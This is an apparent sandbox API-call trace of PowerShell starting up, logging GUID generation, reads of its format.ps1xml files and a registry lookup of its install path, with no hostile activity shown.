	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5055f27, Data2=0x6ba4, Data3=0x49a9, Data4=([0]=0x92, [1]=0x31, [2]=0x37, [3]=0x9b, [4]=0x4a, [5]=0xc2, [6]=0xbb, [7]=0xad))) returned 0x0
	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7c217098, Data2=0x4241, Data3=0x4f28, Data4=([0]=0x98, [1]=0x34, [2]=0x6d, [3]=0xe3, [4]=0xe1, [5]=0xa9, [6]=0x55, [7]=0xbb))) returned 0x0
	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2514d29f, Data2=0x7c45, Data3=0x44a4, Data4=([0]=0x86, [1]=0x9a, [2]=0x27, [3]=0x37, [4]=0x3d, [5]=0x85, [6]=0x5d, [7]=0xed))) returned 0x0
	[0532.232] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xa2a4d934, Data2=0x7e68, Data3=0x4663, Data4=([0]=0xa2, [1]=0xec, [2]=0xaa, [3]=0x64, [4]=0x48, [5]=0x2c, [6]=0x46, [7]=0xd8))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x84647028, Data2=0xac5c, Data3=0x42a3, Data4=([0]=0xa5, [1]=0x95, [2]=0x11, [3]=0xc9, [4]=0xde, [5]=0xa9, [6]=0xa3, [7]=0x10))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x6a3b6a89, Data2=0x734f, Data3=0x48fa, Data4=([0]=0xbd, [1]=0xe9, [2]=0x26, [3]=0x3, [4]=0x6e, [5]=0xc9, [6]=0x36, [7]=0x65))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x42bad0be, Data2=0x54a, Data3=0x480e, Data4=([0]=0xa3, [1]=0x3b, [2]=0x68, [3]=0xd0, [4]=0x3f, [5]=0xdf, [6]=0x90, [7]=0xac))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf935577d, Data2=0x7eaa, Data3=0x4494, Data4=([0]=0x8b, [1]=0x72, [2]=0x39, [3]=0xac, [4]=0xcb, [5]=0x36, [6]=0x5d, [7]=0x23))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xe40c9dfc, Data2=0x68a1, Data3=0x4987, Data4=([0]=0xb3, [1]=0x17, [2]=0x15, [3]=0xf9, [4]=0xee, [5]=0x8d, [6]=0xa, [7]=0x86))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2bcd1aa8, Data2=0x81ff, Data3=0x4e72, Data4=([0]=0x83, [1]=0xf4, [2]=0x62, [3]=0x2, [4]=0xb4, [5]=0xd3, [6]=0xd9, [7]=0x7f))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x51dd51e4, Data2=0xd51d, Data3=0x44f7, Data4=([0]=0xb1, [1]=0x6b, [2]=0x1, [3]=0xbc, [4]=0x57, [5]=0xe9, [6]=0x5d, [7]=0xb3))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x954e8bf3, Data2=0x1aa6, Data3=0x432c, Data4=([0]=0xb0, [1]=0xa7, [2]=0xdb, [3]=0x61, [4]=0xa3, [5]=0xcd, [6]=0x72, [7]=0xe8))) returned 0x0
	[0532.233] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x885c7382, Data2=0xeac7, Data3=0x44fd, Data4=([0]=0x92, [1]=0xc9, [2]=0x8b, [3]=0x5a, [4]=0x20, [5]=0x25, [6]=0xdb, [7]=0x96))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x74d54df5, Data2=0xa281, Data3=0x4e71, Data4=([0]=0xa2, [1]=0x3a, [2]=0xed, [3]=0x77, [4]=0x31, [5]=0x27, [6]=0x56, [7]=0x5d))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xe2f6b07d, Data2=0xeb5, Data3=0x489c, Data4=([0]=0xbb, [1]=0x81, [2]=0x82, [3]=0x1a, [4]=0x6b, [5]=0xae, [6]=0x82, [7]=0x93))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x90504261, Data2=0xd92e, Data3=0x416d, Data4=([0]=0xa8, [1]=0xec, [2]=0xd6, [3]=0xb1, [4]=0xf1, [5]=0x29, [6]=0x97, [7]=0x68))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xa674ffc1, Data2=0xbdfc, Data3=0x42c7, Data4=([0]=0x89, [1]=0x78, [2]=0x1f, [3]=0xd1, [4]=0x56, [5]=0xa8, [6]=0x74, [7]=0xaf))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x143c4f54, Data2=0x63ad, Data3=0x445a, Data4=([0]=0xb9, [1]=0xaf, [2]=0x9c, [3]=0x94, [4]=0x36, [5]=0xf5, [6]=0x4f, [7]=0x84))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x442ee563, Data2=0x6570, Data3=0x4e27, Data4=([0]=0x9b, [1]=0x3, [2]=0x14, [3]=0x41, [4]=0xcb, [5]=0xc1, [6]=0xa8, [7]=0x2e))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x70fabc7f, Data2=0x66da, Data3=0x4124, Data4=([0]=0xbd, [1]=0xdd, [2]=0x1e, [3]=0x43, [4]=0xf3, [5]=0x52, [6]=0xaa, [7]=0xb8))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x1325b8d4, Data2=0xb076, Data3=0x4541, Data4=([0]=0x8f, [1]=0x6, [2]=0x7e, [3]=0x8f, [4]=0x78, [5]=0x3b, [6]=0x22, [7]=0x42))) returned 0x0
	[0532.234] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf6150d32, Data2=0x8c54, Data3=0x4e82, Data4=([0]=0x9e, [1]=0x4d, [2]=0x37, [3]=0x6, [4]=0x3d, [5]=0x59, [6]=0x6, [7]=0x42))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x18ce8525, Data2=0xda02, Data3=0x4b60, Data4=([0]=0x8e, [1]=0xea, [2]=0xe0, [3]=0xad, [4]=0x97, [5]=0x44, [6]=0x4f, [7]=0xf5))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xae25c8d9, Data2=0xbaa1, Data3=0x4dd0, Data4=([0]=0xac, [1]=0x35, [2]=0xbd, [3]=0x37, [4]=0x98, [5]=0x61, [6]=0x40, [7]=0x83))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2bd7c659, Data2=0xab12, Data3=0x41d9, Data4=([0]=0xa4, [1]=0x5a, [2]=0xdd, [3]=0xfd, [4]=0xce, [5]=0xe5, [6]=0xd1, [7]=0x10))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd0900c58, Data2=0xea06, Data3=0x45f8, Data4=([0]=0x94, [1]=0xed, [2]=0x8a, [3]=0x6f, [4]=0x66, [5]=0x60, [6]=0xe8, [7]=0xc))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x61fb9576, Data2=0xf23, Data3=0x4f75, Data4=([0]=0x8a, [1]=0xa4, [2]=0x8c, [3]=0x88, [4]=0x1b, [5]=0xf8, [6]=0x65, [7]=0x1a))) returned 0x0
	[0532.235] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf6baa4c, Data2=0xc402, Data3=0x42f6, Data4=([0]=0x83, [1]=0xd, [2]=0xe8, [3]=0x10, [4]=0x5d, [5]=0x72, [6]=0x9e, [7]=0xe8))) returned 0x0
	[0532.236] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf0269696, Data2=0x3807, Data3=0x4baf, Data4=([0]=0x93, [1]=0xb6, [2]=0x73, [3]=0xc0, [4]=0xb, [5]=0x6d, [6]=0x41, [7]=0x2f))) returned 0x0
	[0532.236] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0532.236] GetFileType (hFile=0x2e8) returned 0x1
	[0532.236] SetErrorMode (uMode=0x1) returned 0x1
	[0532.236] GetFileType (hFile=0x2e8) returned 0x1
	[0532.236] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.237] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.237] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.237] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.238] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.238] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.238] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x119, lpOverlapped=0x0) returned 1
	[0532.238] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef93d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ef93d8*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0532.238] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0532.238] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0532.238] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0532.238] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0532.239] CoTaskMemFree (pv=0x376d70) 
	[0532.239] RegCloseKey (hKey=0x2e8) returned 0x0
	[0532.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0532.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0532.240] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5fcda500, Data2=0xf5f5, Data3=0x4c75, Data4=([0]=0x8d, [1]=0x31, [2]=0x7f, [3]=0xde, [4]=0x20, [5]=0x28, [6]=0x37, [7]=0xc7))) returned 0x0
	[0532.240] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x262a994a, Data2=0x930b, Data3=0x449a, Data4=([0]=0xa5, [1]=0x63, [2]=0x49, [3]=0x15, [4]=0xa0, [5]=0x8b, [6]=0x34, [7]=0x38))) returned 0x0
	[0532.240] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x61c04baf, Data2=0xc1ba, Data3=0x4457, Data4=([0]=0x8c, [1]=0x8c, [2]=0x48, [3]=0xcf, [4]=0xcf, [5]=0xcb, [6]=0xf5, [7]=0x21))) returned 0x0
	[0532.240] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x60680dc4, Data2=0xb0c1, Data3=0x499b, Data4=([0]=0xb1, [1]=0x34, [2]=0x87, [3]=0xc2, [4]=0x83, [5]=0xcc, [6]=0xeb, [7]=0x7f))) returned 0x0
	[0532.240] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0532.240] GetFileType (hFile=0x2e8) returned 0x1
	[0532.240] SetErrorMode (uMode=0x1) returned 0x1
	[0532.241] GetFileType (hFile=0x2e8) returned 0x1
	[0532.241] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.242] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.242] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.242] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.242] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.242] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.243] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.243] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.244] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.244] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.244] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.245] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.245] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.245] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.993] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.993] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.995] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.996] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.996] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.996] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.996] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.996] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.997] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.997] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.997] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.997] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.998] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.998] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.998] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.999] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.999] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0532.999] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.001] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.002] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.002] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.002] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.002] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.003] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.003] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.003] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.003] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.004] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
